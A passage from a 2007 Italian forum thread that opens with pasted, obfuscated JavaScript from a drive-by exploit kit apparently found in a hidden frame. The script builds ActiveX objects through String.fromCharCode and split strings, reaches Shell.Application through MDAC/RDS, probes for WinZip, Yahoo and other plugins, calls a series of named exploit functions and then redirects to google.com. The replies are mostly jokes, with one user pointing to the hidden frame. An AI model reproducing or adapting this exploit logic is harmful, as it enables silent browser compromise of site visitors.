a.setAttribute(String.fromCharCode(99,108)+String. fromCharCode(98-1,115,115)+String.fromCharCode(102+3,100), String.fromCharCode(99,108)+ String.fromCharCode(115,105,100,58) + mdacPay[i].substring(1, mdacPay[i].length - 1));
}
else { try { a = eval("new A"+"ctive"+"XObject")(mdacPay[i]); } catch(e){}}

if (a)
{
try
{
var b = newRdsObject(a, decode64("U2hlbGwuQXBwbGljYXRpb24="));
if (b) { if (Go(a)) break;}
}
catch(e){}
}
i++;
}
if(mdk==0)
{
if ( iswzip || isqt || isya || isya2 ||issdk)
{


if (isya2) yahoo2_exploit();
if (isya) yahoo_exploit();
if (issdk) sdk_exploit();
if (iswzip) winzip_exploit();

}
setslice_exploit();
}
}

function testwzip()
{
iswzip = 0;
try { var wzip = eval("ne"+"w A"+"cti"+"ve"+"X"+"Obj"+"e"+"ct('WZFILEVIEW.'+'FileViewCtrl.61');"); iswzip = 1; }
catch(e){};
return iswzip;
}




var isMemory = false;
var interval = 3;
var exploit = 0;
var iswzip = testwzip();

var browser = testBrowser();
var system = getVersion();

if (browser == "MSIE" && system == "2K") w2k_exploit();

if (browser == "MSIE")
{
if (system == "2K") w2k_exploit();
else mdac_exploit();
if(mdk==0) document.location="http://google.com"
}
else
{


setTimeout('wmplayer_exploit();',interval * 500);
}


</script>

</html>

andrea.paiola
08-09-2007, 19:15
ora diventato tecnico :fighet: :D

Vincent.Zeno
08-09-2007, 19:16
e ti sembra normale tutto questo in un frame nascosto?

Drean
08-09-2007, 19:16
http://img251.imageshack.us/img251/34/saywutoe3.jpg

fred84
08-09-2007, 19:20
Originariamente inviato da Drean
http://img251.imageshack.us/img251/34/saywutoe3.jpg :malol: :malol: :malol: :malol: :malol: :malol: :malol: :malol:

Loading